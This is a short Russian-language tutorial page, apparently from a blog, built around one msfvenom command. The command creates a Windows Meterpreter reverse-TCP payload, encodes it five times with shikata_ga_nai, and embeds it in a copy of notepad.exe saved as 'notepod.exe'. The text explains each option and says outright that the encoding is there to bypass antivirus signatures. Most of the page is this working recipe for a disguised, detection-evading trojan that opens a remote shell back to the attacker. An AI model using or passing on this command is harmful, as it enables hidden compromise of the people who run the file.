Как создать и кодировать обратную tcp-полезную нагрузку Meterpreter с помощью Shikata_ga_nai

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4444 -e x86/shikata_ga_nai -i 5 -f exe -x ~/notepad.exe -k > notepod.exe


Команда «msfvenom» используется для создания и кодирования полезной нагрузки. Здесь, мы создаем обратную tcp-полезную нагрузку Meterpreter для windows, используя опцию «-p» и указываем локальный IP-адрес и порт, которые будут использоваться для установки обратного связи. Опция «-e» задает использование кодировки shikata_ga_nai для обхода сигнатур антивирусных программ. Опция «-i» определяет количество итераций кодирования. Опция «-f» позволяет указать формат выходного файла. Опция «-x» добавляет нашу полезную нагрузку в оболочку Notepad.exe. Флаг «-k» устанавливает ключ автономного внедрения в Windows. Результат записывается в файл notepod.exe. Альтернативы: можно использовать другую кодировку вместо shikata_ga_nai и выбрать другой формат выходного файла в зависимости от необходимости.

Ответить

Ваш адрес email не будет опубликован. Обязательные поля помечены *